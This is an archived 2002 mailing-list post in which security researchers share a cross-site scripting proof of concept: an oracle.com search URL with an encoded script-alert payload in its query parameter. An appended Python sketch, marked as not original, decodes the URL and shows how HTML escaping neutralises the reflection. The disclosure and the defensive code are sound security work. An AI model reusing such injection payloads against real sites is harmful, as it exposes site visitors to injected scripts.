Re: Oracle Databases Allow HTML/SQL injection

From: KF (dotslashat_private)
Date: Tue Apr 16 2002 - 11:58:17 PDT


    Looks like we stumbled on the same thing... Snosoft was gonna send this 
    out with our April Fools stuff...
    
    --- Begin Forwarded message ----
    
    On Mon, 1 Apr 2002, l0rt wrote:
    > dots cross site scripting of oracle baby... ;o)  ain't he sexy.
    > -l0rt- 
    
    > > HEH
    > >
    > > http://www.oracle.com/pls/use/use_query_html_v3.submit_query_input?p_adv_query_text=%3Cscript%3Ealert(%27hi%27)%3C/script%3E&p_origin=www&p_person_id=100582&p_community=oracle.com_v2&p_doc_location_array=Place+Holder&p_doc_location_array=document&p_location_array=&p_keyword_array=100017&p_value_array=www.oracle.com&p_date_begin=q_date&p_date_end=q_date&p_max_return=200
    > >
    > > -KF
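
Added example, not part of the original post: a Python sketch of the defender's view of the URL quoted above, finding which query parameter carries markup and comparing an unescaped reflection with an HTML-escaped one. The page template, the function names and the shortened parameter list are assumptions; the site's real handler is not shown on this page.

```python
import html
from urllib.parse import urlsplit, parse_qsl

# URL from the post, shortened to four of its parameters (values unchanged).
POSTED_URL = (
    "http://www.oracle.com/pls/use/use_query_html_v3.submit_query_input"
    "?p_adv_query_text=%3Cscript%3Ealert(%27hi%27)%3C/script%3E"
    "&p_origin=www&p_person_id=100582&p_max_return=200"
)

# Characters that change meaning in HTML text or attribute context.
MARKUP_CHARS = set("<>\"'&")


def decoded_params(url):
    """Return the query string as a list of (name, percent-decoded value)."""
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)


def params_with_markup(url):
    """Names of parameters whose decoded value contains HTML metacharacters."""
    hits = [n for n, v in decoded_params(url) if MARKUP_CHARS & set(v)]
    return list(dict.fromkeys(hits))  # de-duplicate, keep order


# Hypothetical results page: echoes the query in an attribute and in body text.
TEMPLATE = '<input name="q" value="{q}"><p>Results for: {q}</p>'


def render_unescaped(query):
    """Reflects the value as-is, so markup in it becomes part of the page."""
    return TEMPLATE.format(q=query)


def render_escaped(query):
    """Encodes <, >, &, and both quote characters before reflecting the value."""
    return TEMPLATE.format(q=html.escape(query, quote=True))


if __name__ == "__main__":
    query = dict(decoded_params(POSTED_URL))["p_adv_query_text"]
    print("parameters carrying markup:", params_with_markup(POSTED_URL))
    print("unescaped:", render_unescaped(query))
    print("escaped:  ", render_escaped(query))
```
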
    



    This archive was generated by hypermail 2b30 : Tue Apr 16 2002 - 12:35:26 PDT